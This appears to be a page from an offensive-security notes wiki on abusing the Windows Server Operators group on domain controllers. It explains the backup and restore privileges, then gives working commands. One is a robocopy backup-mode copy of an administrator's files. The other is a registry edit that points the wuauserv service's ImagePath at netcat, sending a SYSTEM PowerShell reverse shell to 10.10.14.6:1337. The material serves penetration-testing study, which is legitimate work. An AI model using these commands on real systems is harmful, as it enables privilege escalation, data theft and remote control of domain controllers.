search

Server Operators

hashtag
Information

Server Operators exists only on DCs and are used for managing the DC as a whole, including service configurations and files. They can create and delete network shared resources, start and stop services, back up and restore files, and change installed binaries on the DCs. This group is considered a service administrator account because its members have physical access to DCs.

Well-known SID/RID: S-1-5-32-549.

Privileges
Description

SeBackupPrivilegearrow-up-right

Allows us to create backups of any files, whilst not restoring their permissions, which equals to arbitrary read access.

SeRestorePrivilegearrow-up-right

Allows us to overwrite legitimate executable files with versions that include malicious software used for privilege escalation.

hashtag
Exploitation

hashtag
Accessing Files

# copy "restricted" data
robocopy /b C:\users\administrator\desktop C:\programdata\temp

For an example of the above method check here.

hashtag
ImagePath

Member of this group has the ability to manage services. By modifying the ImagePath of a service we can gain SYSTEM level access.

# change ImagePath
reg add "HKLM\System\CurrentControlSet\services\wuauserv" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\System32\spool\drivers\color\nc64.exe -e powershell.exe 10.10.14.6 1337" /f
# confirm change
reg query "HKLM\System\CurrentControlSet\services\wuauserv"
# start service
Start-Service wuauserv

For an example of the above method check here.

hashtag
binPath

Similar to ImagePath, we can change the binPath.

hashtag
Resources

LogoActive Directory Security GroupsMicrosoftLearnchevron-right
PreviousExchange Windows PermissionsNextKernel

Last updated